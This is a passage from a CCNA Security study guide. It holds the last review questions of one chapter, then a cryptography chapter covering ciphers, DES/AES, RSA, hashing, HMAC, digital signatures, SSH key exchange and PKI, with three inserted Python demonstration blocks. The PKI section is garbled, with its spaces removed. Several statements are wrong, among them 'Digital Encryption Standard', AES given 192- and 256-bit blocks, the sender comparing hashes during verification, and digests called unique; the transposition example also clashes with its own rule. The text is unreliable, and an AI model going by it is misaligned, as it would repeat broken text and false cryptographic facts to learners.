C. DHCP snooping
D. NAT
10. Which of the following attaches itself to another application to replicate or distribute itself?
A. Worm
B. Rootkit
C. Spyware
D. Virus
11. Which of the following is considered to be a unique creation of the mind?
A. PII
B. IP
C. PHI
D. IPS
12. Which of the following provides recommendations for securely handling credit card data?
A. HIPAA
B. SOX
C. PCI-DSS
D. GLBA
13. At what OSI layer does MAC address spoofing occur?
A. 1
B. 2
C. 3
D. 4
14. Which of the following is mitigation for email spoofing?
A. SPF
B. DAI
C. DNSSec
D. DHCP snooping
15. Which of the following is a common tool used for ping and port scans?
A. Metasploit
B. Nmap
C. Netstat
D. Snort
16. Which of the following is not a flag set in an XMAS scan?
A. FIN
B. PSH
C. SYN
D. URG
17. Which of the following attacks uses an oversized ICMP packet?
A. Ping of death
B. Smurf
C. Fraggle
D. SYN flood
18. Which of the following is a reflected DDoS attack?
A. Ping of death
B. Smurf
C. Buffer overflow
D. XSS
19. Which attack type does DAI address?
A. IP spoofing
B. MAC overflow
C. ARP poisoning
D. Ping of death
20. Which of the following pollutes the contents of a computer's DNS cache so that requests to a legitimate site are actually routed to an alternate site?
A. Phishing
B. Pharming
C. Vishing
D. Whaling
Chapter 3
Understanding Cryptography
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
1.3 Cryptography concepts
Describe key exchange
Describe hash algorithm
Compare and contrast symmetric and asymmetric encryption
Describe digital signatures, certificates, and PKI
Cryptography is the use of mathematical algorithms to scramble data so it cannot be read if captured. In that role cryptography provides confidentiality, but that is not the only security goal it can achieve. Through the use of hash values and digital signatures, it can also provide assurance of data integrity and origin authentication. This chapter will cover the types of cryptography, their strengths and weaknesses, and some of the services that cryptography can provide.
In this chapter, you will learn the following:
Cryptography concepts
Symmetric and Asymmetric Encryption
There are two types of cryptography algorithms that you must understand, symmetric and asymmetric. A bit later in this section you will learn the differences between these two systems and the advantages and disadvantages of both. You'll also learn when to apply these algorithms to secure both data at rest and data in transit.
But first let's look at some basic concepts used in cryptography. First you'll be introduced to some of the various ways algorithms scramble the data. Then you'll learn about two different ways encryption algorithms operate on the data.
Ciphers
Cryptographic algorithms are often called ciphers for short, and these ciphers are mathematical formulas that move the data around in various ways to scramble it. The two main methods are substitution and transposition. I'll cover these in this section, along with a method of addressing shortcomings of substitution. Ciphers also differ in the amount of data that is encrypted at a time. The two main types of algorithms with respect to this issue are block and stream ciphers, which will also be covered in this section.
Substitution
A substitution cipher uses a key to substitute characters or character blocks with different characters or character blocks. The Caesar cipher and the Vigenère cipher are two of the earliest forms of substitution ciphers. Figure 3.1 shows the ROT13, which is a Caesar cipher. It rotates the alphabet 13 positions. Therefore, the message "Hello" encrypts to the ciphertext URYYB.
FIGURE 3.1 ROT13 Caesar cipher
One of the issues with substitution ciphers is if the message is of sufficient length, patterns in the encryption begin to become noticeable, which makes it vulnerable to a frequency attack. A frequency attack is when the attacker uses these recurring patterns to reverse engineer the message. For this reason, the polyalphabetic algorithm was created.
Polyalphabetic
To increase the difficulty of performing a frequency attack, polyalphabetic algorithms were created. They use multiple instances of the alphabet shifted in a 26 × 26 table called a tableau, shown in Figure 3.2. The figure shows the Vigenère cipher, an example of a polyalphabetic cipher.
FIGURE 3.2 Vigenère cipher
As an example of a message on which the Vigenère cipher is applied, let's use the security key SYBEX and the plaintext message of WEATTACKATFIVE. The first letter in the plaintext message is W, and the first letter in the key is S. We should locate the letter W across the headings for the columns. We follow that column down until it intersects with the row that starts with the letter S, resulting in the letter O. The second letter of the plaintext message is E, and the second letter in the key is Y. Using the same method, we obtain the letter C. We continue in this same manner until we run out of key letters, and then we start over with the key, which would result in the second A in the plaintext message working with the letter S of the key.
So, applying this technique to the entire message of WEATTACKATFIVE, the plaintext message converts to the OCBXQSALEQXGWI ciphertext message.
Transposition
A transposition cipher scrambles the letters of the original message in a different order. The key determines the positions to which the letters are moved.
The following is an example of a simple transposition cipher:
Original message    SNOWFLAKESWILLFALL
Broken into groups  SNOW FLAK ESWI FALL
Key                 4231 2314 4231 2314
Ciphertext message  WONS LAFK IWSE ALFL
With this example, the original message is SNOWFLAKESWILLFALL, and the key is 42312314. The ciphertext message is WONSLAFKIWSEALFL. So, you take the first four letters of the plaintext message (SNOW) and use the first four numbers (4231) as the key for transposition. The key describes the relative positions of the same characters in the ciphertext. In the new ciphertext, the letters would be WONS. Then you take the next four letters of the plaintext message (FLAK) and use the next four numbers (2314) as the key for transposition. In the new ciphertext, the letters would be LAFK. Then you take the next four letters of the original message and apply the first four numbers of the key because you do not have any more numbers in the key. Continue this pattern until complete.
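The three classical ciphers discussed above, as an added example that is not part of the book: the Caesar shift (ROT13), the Vigenère tableau expressed as modular addition of letter indices, and the grouped transposition with a repeating key. Padding a short final group with X is an assumption made here; the book does not say how short groups are handled. The transposition rule used is that ciphertext position i of each group holds the plaintext letter at key position i; applied to the 2314 groups it reproduces the book's LAFK and ALFL, while for the 4231 groups it yields WNOS and ISWE rather than the WONS and IWSE printed above, so check those two groups against the figure rather than the text.

```python
# Added example (not from the book): the ROT13/Caesar, Vigenère and grouped
# transposition ciphers described above, written so the worked values in the
# text can be reproduced and reversed.  Padding short groups with X is an
# assumption; the book does not say how a short final group is handled.
import string

ALPHABET = string.ascii_uppercase


def caesar(text: str, shift: int) -> str:
    """Shift each letter by `shift` places; ROT13 is shift 13 and is its own
    inverse.  Non-letters pass through; output is upper case."""
    out = []
    for ch in text.upper():
        out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26] if ch in ALPHABET else ch)
    return "".join(out)


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Polyalphabetic substitution over letters only.  Reading the tableau at
    column = plaintext letter, row = key letter equals adding the two letter
    indices modulo 26; the key repeats when the message is longer than it."""
    key = key.upper()
    out = []
    for i, ch in enumerate(text.upper()):
        k = ALPHABET.index(key[i % len(key)])
        out.append(ALPHABET[(ALPHABET.index(ch) + (-k if decrypt else k)) % 26])
    return "".join(out)


def _key_groups(key: str, group: int):
    # "42312314" with group 4 becomes the permutations [3,1,2,0] and [1,2,0,3],
    # applied to successive groups of the message and repeated as needed.
    perms = [[int(d) - 1 for d in key[i:i + group]] for i in range(0, len(key), group)]
    for perm in perms:
        if sorted(perm) != list(range(group)):
            raise ValueError("each key group must be a permutation of 1..group")
    return perms


def transpose(text: str, key: str, group: int = 4) -> str:
    """Ciphertext position i of each group holds the plaintext letter at key
    position i (1-based), so FLAK with 2314 gives LAFK."""
    perms = _key_groups(key, group)
    text = text.upper()
    text += "X" * (-len(text) % group)  # assumption: pad the last short group with X
    out = []
    for j in range(0, len(text), group):
        chunk, perm = text[j:j + group], perms[(j // group) % len(perms)]
        out.append("".join(chunk[p] for p in perm))
    return "".join(out)


def untranspose(cipher: str, key: str, group: int = 4) -> str:
    """Inverse of transpose: put ciphertext letter i back at key position i."""
    perms = _key_groups(key, group)
    out = []
    for j in range(0, len(cipher), group):
        chunk, perm = cipher[j:j + group], perms[(j // group) % len(perms)]
        plain = [""] * group
        for i, p in enumerate(perm):
            plain[p] = chunk[i]
        out.append("".join(plain))
    return "".join(out)


if __name__ == "__main__":
    print(caesar("Hello", 13))                  # URYYB
    print(vigenere("WEATTACKATFIVE", "SYBEX"))  # OCBXQSALEQXGWI
    print(transpose("FLAKFALL", "2314"))        # LAFKALFL
```

Because every function is reversible with the same key, the block also shows why these ciphers are classed as symmetric: whoever holds the key can both produce and undo the scrambling.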
Algorithms
While cryptographic algorithms can deploy either substitution or transposition, there is another key characteristic that differentiates two main classes of algorithms: symmetric and asymmetric. In the next two sections, I'll talk about how they are different.
Symmetric
Symmetric algorithms use a private or secret key that must remain secret between the two parties. Each party pair requires a separate private key. Therefore, a single user would need a unique secret key for every user with whom she communicates.
Consider an example where there are 10 unique users. Each user needs a separate private key to communicate with the other users. To calculate the number of keys that would be needed in this example, you would use the following formula:
# of users × (# of users – 1) / 2
Using our example, you would calculate 10 × (10 – 1) / 2, or 45 needed keys.
With symmetric algorithms, the encryption key must remain secure. To obtain the secret key, the users must find a secure out-of-band method for communicating the secret key, including courier or direct physical contact between the users.
A special type of symmetric key called a session key encrypts messages between two users during one communication session. Symmetric algorithms can be referred to as single-key, secret-key, private-key, or shared-key cryptography.
Symmetric systems provide confidentiality but not authentication or nonrepudiation. If both users use the same key, determining where the message originated is impossible. Symmetric algorithms include DES, AES, 3DES, and RC4. Table 3.1 lists the strengths and weaknesses of symmetric algorithms.
TABLE 3.1 Symmetric algorithm strengths and weaknesses
Strengths                              Weaknesses
Cheaper to implement than asymmetric   Key compromise can occur more easily than with asymmetric
Faster than asymmetric                 Difficulty in performing secure key distribution
Hard to crack                          Key compromise occurs if one party is compromised, thereby allowing impersonation
The two broad types of symmetric algorithms are stream-based ciphers and block ciphers. Initialization vectors (IVs) are an important part of block ciphers. These three components will be discussed in the next sections.
Block
Another way in which ciphers can differ is in the amount of data that is encrypted at a time. Block ciphers perform encryption by breaking the message into fixed-length units. A message of 1,024 bits could be divided into 16 blocks of 64 bits each. Each of those 16 blocks is processed by the algorithm formulas, resulting in a single block of ciphertext.
Advantages of block ciphers include the following:
The implementation is easier than stream-based cipher implementation.
They are generally less susceptible to security issues.
They are generally used more in software implementations.
Block ciphers employ both substitution and transposition.
Stream
Stream-based ciphers perform encryption on a bit-by-bit basis and use keystream generators. The keystream generators create a bit stream that is XORed with the plaintext bits. The result of this XOR operation is the ciphertext.
A synchronous stream-based cipher depends only on the key, and an asynchronous stream cipher depends on the key and plaintext. The key ensures that the bit stream that is XORed to the plaintext is random.
An example of a stream-based cipher is RC4.
Advantages of stream-based ciphers include the following:
They generally have lower error propagation because encryption occurs on each bit.
They are generally used more in hardware implementation.
They use the same key for encryption and decryption.
They are generally cheaper to implement than block ciphers.
They employ only substitution.
Initialization Vectors
Some modes of symmetric key algorithms use initialization vectors to ensure that patterns are not produced during encryption. These IVs provide this service by using random values with the algorithms. Without using IVs, a repeated phrase within a plaintext message could result in the same ciphertext. Attackers can possibly use these patterns to break the encryption.
Digital Encryption Standard (DES)
Digital Encryption Standard (DES) uses a 64-bit key, 8 bits of which are used for parity. Therefore, the effective key length for DES is 56 bits. DES divides the message into 64-bit blocks. Sixteen rounds of transposition and substitution are performed on each block, resulting in a 64-bit block of ciphertext.
DES has mostly been replaced by 3DES and AES, both of which are discussed later in this chapter.
3DES
Because of the need to quickly replace DES, Triple DES (3DES), a version of DES that increases security by using three 56-bit keys, was developed. Although 3DES is resistant to attacks, it is up to three times slower than DES. 3DES did serve as a temporary replacement to DES. However, the National Institute of Standards and Technology (NIST) has actually designated the Advanced Encryption Standard (AES) as the replacement for DES, even though 3DES is still in use today.
DES can operate in a number of different modes, but the two most common are Electronic Code Book (ECB) and Cipher Block Chaining (CBC). In ECB, 64-bit blocks of data are processed by the algorithm using the key. The ciphertext produced can be padded to ensure that the result is a 64-bit block. If an encryption error occurs, only one block of the message is affected. ECB operations run in parallel, making it a fast method.
Although ECB is the easiest and fastest mode to use, it has security issues because every 64-bit block is encrypted with the same key. If an attacker discovers the key, all the blocks of data can be read. If an attacker discovers both versions of the 64-bit block (plaintext and ciphertext), the key can be determined. For these reasons, the mode should not be used when encrypting a large amount of data because patterns would emerge. ECB is a good choice if an organization needs encryption for its databases because ECB works well with the encryption of short messages.
Figure 3.3 shows the ECB encryption process.
FIGURE 3.3 ECB process
In CBC, each 64-bit block is chained together because each resultant 64-bit ciphertext block is applied to the next block. So, plaintext message block 1 is processed by the algorithm using an IV. The resultant ciphertext message block 1 is XORed with plaintext message block 2, resulting in ciphertext message 2. This process continues until the message is complete.
Unlike ECB, CBC encrypts large files without having any patterns within the resulting ciphertext. If a unique IV is used with each message encryption, the resultant ciphertext will be different every time even in cases where the same plaintext message is used.
Figure 3.4 shows the CBC encryption process.
FIGURE 3.4 CBC process
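The ECB and CBC modes described above and the IV behaviour from the "Initialization Vectors" section, as an added example that is not part of the book. The block cipher underneath is a stand-in chosen so the example runs on the Python standard library: a 4-round Feistel network whose round function is keyed BLAKE2b from hashlib. That cipher is an assumption of the example and is not DES or AES; the point is the mode, and the `repeated_blocks` counter makes the pattern leakage of ECB measurable without knowing the key.

```python
# Added example (not from the book): ECB and CBC as described above, with a
# counter of repeated ciphertext blocks to make the pattern leakage visible.
# The block cipher underneath is a stand-in: a 4-round Feistel network with
# keyed BLAKE2b (hashlib) as the round function, chosen so the example runs
# on the standard library.  It is NOT DES or AES and must not protect real
# data; use a vetted library and an authenticated mode for that.
import hashlib
import os

BLOCK = 8  # 64-bit blocks, matching the DES block size in the text


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round_function(key: bytes, rnd: int, half: bytes) -> bytes:
    # Keyed pseudo-random function of one 32-bit half block (demo assumption).
    return hashlib.blake2b(bytes([rnd]) + half, key=key, digest_size=4).digest()


def _feistel(key: bytes, block: bytes, rounds) -> bytes:
    # A Feistel network is a permutation whatever the round function is, and
    # decryption is the same walk with the round order reversed.
    if len(block) != BLOCK:
        raise ValueError("block must be exactly 8 bytes")
    left, right = block[:4], block[4:]
    for rnd in rounds:
        left, right = right, _xor(left, _round_function(key, rnd, right))
    return right + left


def block_encrypt(key: bytes, block: bytes) -> bytes:
    return _feistel(key, block, range(4))


def block_decrypt(key: bytes, block: bytes) -> bytes:
    return _feistel(key, block, reversed(range(4)))


def pad(data: bytes) -> bytes:
    # PKCS#7-style padding so the last block is always full.
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def _blocks(data: bytes):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # Each block is encrypted independently: equal plaintext blocks give equal ciphertext blocks.
    return b"".join(block_encrypt(key, b) for b in _blocks(pad(plaintext)))


def ecb_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    return unpad(b"".join(block_decrypt(key, b) for b in _blocks(ciphertext)))


def cbc_encrypt(key: bytes, plaintext: bytes, iv: bytes = None) -> bytes:
    # Each plaintext block is XORed with the previous ciphertext block (the IV
    # for block 1) before encryption; the IV travels in the clear, prepended.
    iv = os.urandom(BLOCK) if iv is None else iv
    out, prev = [iv], iv
    for b in _blocks(pad(plaintext)):
        prev = block_encrypt(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    chunks = _blocks(ciphertext)
    prev, out = chunks[0], []
    for b in chunks[1:]:
        out.append(_xor(block_decrypt(key, b), prev))
        prev = b
    return unpad(b"".join(out))


def repeated_blocks(ciphertext: bytes, skip_iv: bool = False) -> int:
    """Number of ciphertext blocks that duplicate an earlier one: the pattern
    an observer can read off ECB output without knowing the key."""
    chunks = _blocks(ciphertext[BLOCK:] if skip_iv else ciphertext)
    return len(chunks) - len(set(chunks))


if __name__ == "__main__":
    key = b"constructed demo key"
    msg =  b"ATTACK AT DAWN. " * 4  # constructed, deliberately repetitive
    print("ECB repeated blocks:", repeated_blocks(ecb_encrypt(key, msg)))
    print("CBC repeated blocks:", repeated_blocks(cbc_encrypt(key, msg), skip_iv=True))
```

Run it and the ECB ciphertext of the repetitive message shows six duplicated blocks while the CBC ciphertext shows none; encrypting the same message twice under CBC with fresh IVs also gives two different ciphertexts, which is the property the text attributes to a unique IV per message.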
Advanced Encryption Standard (AES)
Advanced Encryption Standard (AES) is the replacement algorithm for DES. Although AES is considered the standard, the algorithm that is used in the AES standard is the Rijndael algorithm. The AES and Rijndael terms are often used interchangeably.
The three block sizes that are used in the Rijndael algorithm are 128, 192, and 256 bits. A 128-bit key with a 128-bit block size undergoes 10 transformation rounds. A 192-bit key with a 192-bit block size undergoes 12 transformation rounds. Finally, a 256-bit key with a 256-bit block size undergoes 14 transformation rounds.
Rijndael employs transformations composed of three layers: nonlinear layer, key addition layer, and linear-mixing layer. The Rijndael design is very simple, and its code is compact, which allows it to be used on a variety of platforms. It is the required algorithm for sensitive but unclassified U.S. government data.
RC4
A total of six RC algorithms have been developed by Ron Rivest. RC1 was never published, RC2 was a 64-bit block cipher, and RC3 was broken before release. RC4, also called ARC4, is one of the most popular stream ciphers. It is used in SSL and WEP. RC4 uses a variable key size of 40 to 2,048 bits and up to 256 rounds of transformation.
Asymmetric
Asymmetric algorithms use both a public key and a private or secret key. The public key is known by all parties, and the private key is known only by its owner. One of these keys encrypts the message, and the other decrypts the message.
In asymmetric cryptography, determining a user's private key is virtually impossible even if the public key is known, although both keys are mathematically related. However, if a user's private key is discovered, the system can be compromised.
Asymmetric algorithms can be referred to as dual-key or public-key cryptography.
Asymmetric systems provide confidentiality, integrity, authentication, and nonrepudiation. Because both users have one unique key that is part of the process, determining where the message originated is possible.
If confidentiality is the primary concern for an organization, a message should be encrypted with the receiver's public key, which is referred to as a secure message format. If authentication is the primary concern for an organization, a message should be encrypted with the sender's private key, which is referred to as an open message format. When using open message format, the message can be decrypted by anyone with the public key.
Perhaps the most widely known and used asymmetric algorithm is RSA. Other asymmetric algorithms include ElGamal, DSA, and Elliptic Curve Cryptography (ECC).
RSA
RSA is the most popular asymmetric algorithm and was invented by Ron Rivest, Adi Shamir, and Leonard Adleman. RSA can provide key exchange, encryption, and digital signatures. The strength of the RSA algorithm is the difficulty of finding the prime factors of very large numbers. RSA uses a 1,024- to 4,096-bit key and performs one round of transformation.
As a key exchange protocol, RSA encrypts a DES or AES symmetric key for secure distribution. RSA uses a one-way function to provide encryption/decryption and digital signature verification/generation. The public key works with the one-way function to perform encryption and digital signature verification. The private key works with the one-way function to perform decryption and signature generation. These processes will be covered in detail in the section "Public Key Infrastructure (PKI)."
Hashing Algorithms
A hash function runs data through a cryptographic algorithm to produce a one-way message digest. The size of the message digest is determined by the algorithm used. The message digest represents the data but cannot be reversed in order to determine the original data. Because the message digest is unique, it can be used to check data integrity.
A one-way hash function reduces a message to a hash value. A comparison of the sender's hash value to the receiver's hash value determines message integrity. If the resultant hash values are different, then the message has been altered in some way, provided that both the sender and the receiver used the same hash function. Hash functions do not prevent data alteration but provide a means to determine whether data alteration has occurred.
Hash functions do have limitations. If an attacker intercepts a message that contains a hash value, the attacker can alter the original message to create a second invalid message with a new hash value. If the attacker then sends the second invalid message to the intended recipient, the intended recipient will have no way of knowing that he received an incorrect message. When the receiver performs a hash value calculation, the invalid message will look valid because the invalid message was appended with the attacker's new hash value, not the original message's hash value. To prevent this from occurring, the sender should use a Message Authentication Code (MAC).
Encrypting the hash function with a symmetric key algorithm generates a keyed MAC. The symmetric key does not encrypt the original message. It is used only to protect the hash value. Figure 3.5 shows the basic steps of a hash function.
FIGURE 3.5 Hash process
Two major hash function vulnerabilities can occur: collisions and rainbow table attacks. A collision occurs when a hash function produces the same hash value on different messages. A rainbow table attack occurs when rainbow tables are used to reverse a hash by computing all possible hashes and looking up the matching value.
Because a message digest is determined by the original data, message digests can be used to compare different files to see whether they are identical down to the bit level. If a computed message digest does not match the original message digest value, then data integrity has been compromised.
Password hash values are often stored instead of the actual passwords to ensure that the actual passwords are not compromised.
When choosing which hashing function to use, it is always better to choose the function that uses a larger hash value. To determine the hash value for a file, you should use the hash function. As an example, let's suppose you have a document named crypto.doc that you need to ensure is not modified in any way. To determine the hash value for the file using the md5 hash function, you would enter the following command:
md5 crypto.doc
This command would result in a hash value that you should record. Later, when users need access to the file, they should always issue the md5 command listed to recalculate the hash value. If the value is the same as the originally recorded value, the file is unchanged. If it is different, then the file has been changed.
MD5
The MD5 algorithm produces a 128-bit hash value. It performs four rounds of computations. It was originally created because of the issues with MD4, and it is more complex than MD4. However, MD5 is not collision free. For this reason, it should not be used for SSL certificates or digital signatures. The U.S. government requires the usage of SHA-2 instead of MD5. However, in commercial usage, many software vendors publish the MD5 hash value when releasing software patches so customers can verify the software's integrity after download.
SHA-1
SHA-1 produces a 160-bit hash value after performing 80 rounds of computations on 512-bit blocks. SHA-1 corrected the flaw in SHA-0 that made it susceptible to attacks.
SHA-2
SHA-2 is actually a family of hash functions, each of which provides different functional limits. The SHA-2 family is as follows:
SHA-224: Produces a 224-bit hash value after performing 64 rounds of computations on 512-bit blocks.
SHA-256: Produces a 256-bit hash value after performing 64 rounds of computations on 512-bit blocks.
SHA-384: Produces a 384-bit hash value after performing 80 rounds of computations on 1,024-bit blocks.
SHA-512: Produces a 512-bit hash value after performing 80 rounds of computations on 1,024-bit blocks.
SHA-512/224: Produces a 224-bit hash value after performing 80 rounds of computations on 1,024-bit blocks. The 512 designation here indicates the internal state size.
SHA-512/256: Produces a 256-bit hash value after performing 80 rounds of computations on 1,024-bit blocks. Once again, the 512 designation indicates the internal state size.
HMAC
A hash MAC (HMAC) is a keyed-hash Message Authentication Code (MAC) that involves a hash function with a symmetric key. HMAC provides data integrity and authentication. Any of the previously listed hash functions can be used with HMAC, with the HMAC name being appended with the hash function name, as in HMAC-SHA-1. The strength of HMAC is dependent upon the strength of the hash function, including the hash value size and the key size.
HMAC's hash value output size will be the same as the underlying hash function. HMAC can help to reduce the collision rate of the hash function. Figure 3.6 shows the basic steps of an HMAC process.
FIGURE 3.6 HMAC process
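The file-digest check from the md5 crypto.doc passage, the interception limitation the "Hashing Algorithms" section warns about, and the HMAC that closes it, as an added example that is not part of the book. It uses Python's hashlib and hmac modules; the message contents, file name and shared key are constructed for the example.

```python
# Added example (not from the book): recording and rechecking a digest the way
# the `md5 crypto.doc` step above does, the substitution the text warns about
# (an interceptor rewrites the message and recomputes the unkeyed digest), and
# the keyed HMAC that defeats it.  Messages and the shared key are constructed.
import hashlib
import hmac


def digest_bits(algorithm: str) -> int:
    """Output size in bits, for comparison with the sizes listed in the text."""
    return hashlib.new(algorithm).digest_size * 8


def digest_hex(data: bytes, algorithm: str = "sha256") -> str:
    """Hex digest, as a command such as `md5 FILE` or `sha256sum FILE` prints it."""
    return hashlib.new(algorithm, data).hexdigest()


def hash_file(path: str, algorithm: str = "sha256") -> str:
    """Digest of a file read in chunks, so large files need not fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_digest(data: bytes, recorded_hex: str, algorithm: str = "sha256") -> bool:
    """Integrity check against a previously recorded digest (constant-time compare)."""
    return hmac.compare_digest(digest_hex(data, algorithm), recorded_hex)


def make_mac(key: bytes, message: bytes, algorithm: str = "sha256") -> str:
    """HMAC-<algorithm> tag; its size equals the underlying hash output."""
    return hmac.new(key, message, algorithm).hexdigest()


def verify_mac(key: bytes, message: bytes, tag_hex: str, algorithm: str = "sha256") -> bool:
    return hmac.compare_digest(make_mac(key, message, algorithm), tag_hex)


def intercept_unkeyed(new_message: bytes, algorithm: str = "sha256"):
    """What an interceptor can do when only an unkeyed digest travels with the
    message: substitute the message and a freshly computed digest."""
    return new_message, digest_hex(new_message, algorithm)


def intercept_keyed(new_message: bytes, old_tag_hex: str):
    """Without the key the interceptor can only forward the old tag."""
    return new_message, old_tag_hex


def demo():
    """Returns (tampering undetected with a bare hash, tampering detected with HMAC)."""
    original = b"Transfer 100 USD to account 12345"  # constructed message
    forged = b"Transfer 999 USD to account 66666"    # constructed message
    key = b"constructed shared secret"
    msg, dig = intercept_unkeyed(forged)
    undetected = verify_digest(msg, dig)       # passes: the digest matches the forgery
    msg, tag = intercept_keyed(forged, make_mac(key, original))
    detected = not verify_mac(key, msg, tag)   # fails: the tag covers the original
    return undetected, detected
```

The comparison functions use hmac.compare_digest rather than == so that a mismatch is not revealed byte by byte through timing; that is the idiomatic way to compare any digest or tag a remote party supplies.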
Digital Signatures
A digital signature is a hash value encrypted with the sender's private key. A digital signature provides authentication, nonrepudiation, and integrity. A blind signature is a form of digital signature where the contents of the message are masked before it is signed. Figure 3.7 shows the process.
FIGURE 3.7 Digital signature process
The process for creating a digital signature is as follows:
1. The signer obtains a hash value for the data to be signed.
2. The signer encrypts the hash value using his private key.
3. The signer attaches the encrypted hash and a copy of his public key in a certificate to the data and sends the message to the receiver.
The process for verifying the digital signature is as follows:
1. The receiver separates the data, encrypted hash, and certificate.
2. The receiver obtains the hash value of the data.
3. The receiver verifies that the public key is still valid using the PKI.
4. The receiver decrypts the encrypted hash value using the public key.
5. The receiver compares the two hash values. If the values are the same, the message has not been changed.
Public key cryptography, which is discussed later in this chapter, is used to create digital signatures. Users register their public keys with a certification authority (CA), which distributes a certificate containing the user's public key and the CA's digital signature. The digital signature is computed by the user's public key and validity period being combined with the certificate issuer and digital signature algorithm identifier.
The Digital Signature Standard (DSS) is a federal digital security standard that governs the Digital Security Algorithm (DSA). DSA generates a message digest of 160 bits. The U.S. federal government requires the use of DSA, RSA, or Elliptic Curve DSA (ECDSA) and SHA for digital signatures.
DSA is slower than RSA and provides only digital signatures. RSA provides digital signatures, encryption, and secure symmetric key distribution.
Key Exchange
As you have learned, symmetric key algorithms are significantly more efficient at encrypting and decrypting data than are asymmetric algorithms. However, the best way to illustrate the hybrid cryptosystem is to explore the function of SSH.
Application: SSH
Secure Shell (SSH) is an application and protocol that is used to remotely log in to another computer using a secure tunnel. After a session key is exchanged and a secure channel is established, all communication between the two computers is encrypted over the secure channel. SSH is a solution that could be used to remotely access devices, including switches, routers, and servers.
SSH offers a good illustration of the use of asymmetric algorithms to generate and exchange a symmetric key and thereafter to use that key for data encryption. The steps are as follows:
1. The client connects to the server, and the server presents its public key to the client.
2. The client and server negotiate a group of settings that must match on both ends. It includes the symmetric algorithm they will use.
3. The client creates a random session key and encrypts it with the server's public key.
4. The client sends this encrypted session key to the server, and the server decrypts it using its private key.
Using the symmetric key, which they both now possess, the two start encrypting everything that goes on from this point, including the authentication process.
PublicKeyInfrastructureApublickeyinfrastructure(PKI)includessystems,software,andcommunicationprotocolsthatdistribute,manage,andcontrolpublickeycryptography.APKIpublishesdigitalcertificates.BecauseaPKIestablishestrustwithinanenvironment,aPKIcancertifythatapublickeyistiedtoanentityandverifythatapublickeyisvalid.Publickeysarepublishedthroughdigitalcertificates.
TheX.509standardisaframeworkthatenablesauthenticationbetweennetworksandovertheInternet.APKIincludestimestampingandcertificaterevocationtoensurethatcertificatesaremanagedproperly.APKIprovidesconfidentiality,messageintegrity,authentication,andnonrepudiation.
ThestructureofaPKIincludesCAs,certificates,registrationauthorities,certificaterevocationlists,andcross-certification.ThissectiondiscussesthesePKIcomponentsaswellasafewotherPKIconcepts.
PublicandPrivateKeysInpublickeycryptography,twokeysareused,apublickeyandaprivatekey.Thesetwokeysarenotthesame,buttheyaremathematicallyrelatedinsuchawaythatifyouencryptdatawithoneofthem,youcandecryptitwiththeother.Usersanddevicesareissuedpublic/privatekeypairsthatareboundtoadigitaldocumentcalledadigitalcertificate.Thiscertificate(morespecificallythekeystowhichitisbound)canbeusedforavarietyofthingsincludingthefollowing:
Encryptingdata
Asaformofauthentication
Encryptingemail
Digitallysigningsoftware
PrivateKeyTheprivatekeythatisgeneratedaspartofthekeypairismadeavailableonlytotheuserordevicetowhichitwasissued.Thiskeymaybestoredonsoftwareintheuser’scomputer,oritmightbestoredonasmartcardifitistobeusedforauthentication.Atanyrate,thekeyconcepthereisthatitisavailableonlytotheuserordevicetowhichitwasissued.
PublicKeyThepublickeythatisgeneratedaspartofthekeypairismadeavailabletoanyonetowhomthecertificateispresentedbecauseitispartoftheinformationcontainedinthisdigitaldocument.Insomecases,publickeysmaybekeptinarepositorysotheycanberequestedbyanentityifrequired.Regardlessofthemethodusedtoobtainthepublickey,thekeyconcepthereisthatitisavailabletoanyone.
PuttingItTogetherThesekeysworktogethertoperformbothencryptionanddigitalsignatures.Toprovideencryption,thedataisencryptedwiththereceiver’spublickey,whichresultsinciphertextthatonlythereceiver’sprivatekeycandecrypt.Figure3.8showsthisprocess.
FIGURE3.8PKIencryption
Todigitallysignadocument,thesendercreateswhatiscalledahashvalueofthedatabeingsent,encryptsthatvaluewiththesender’shisprivatekey,andsendsthisvaluealongwiththemessage.Thereceiverdecryptsthehashusingthesender’spublickey.Thereceiverthen,usingthesamehashingalgorithm,hashesthemessage.Thesenderthencomparesthedecryptedhashvaluetotheonejustgenerated.Iftheyarethesame,thesignature(andtheintegrityofthedata)hasbeenverified.Figure3.9showsthisprocess.
FIGURE3.9PKIdigitalsignature
CertificatesAdigitalcertificateprovidesanentity,usuallyauser,withthecredentialstoproveitsidentityandassociatesthatidentitywithapublickey.Atminimum,adigitalcertificationmustprovidetheserialnumber,theissuer,thesubject(owner),andthepublickey.
AnX.509certificatecomplieswiththeX.509standard.AnX.509certificatecontainsthefollowingfields:
Version
SerialNumber
AlgorithmID
Issuer
Validity
Subject
SubjectPublicKeyInfo
PublicKeyAlgorithm
SubjectPublicKey
IssuerUniqueIdentifier(optional)
SubjectUniqueIdentifier(optional)
Extensions(optional)
RevocationCertificateshaveadefinedlifetime.Whenthevalidityperiodends,thecertificatemustberenewedtocontinuetobevalid.Therearecaseswhenacertificatemustberevokedbeforeitslifetimeends.Reasonsforcertificaterevocationincludethefollowing:
Compromiseoftheassociatedkeys
Improperissuance
CompromiseoftheissuingCA
Ownerofthecertificatenolongerowningthedomainforwhichitwasissued
Ownerofthecertificateceasingoperationsentirely
Originalcertificatebeingreplacedwithadifferentcertificatefromadifferentissuer
Acertificaterevocationlist(CRL)isalistofdigitalcertificatesthataCAhasrevoked.Tofindoutwhetheradigitalcertificatehasbeenrevoked,eitherthebrowsermustchecktheCRLortheCAmustpushouttheCRLvaluestoclients.ThiscanbecomequitedauntingwhenyouconsiderthattheCRLcontainseverycertificatethathaseverbeenrevoked.
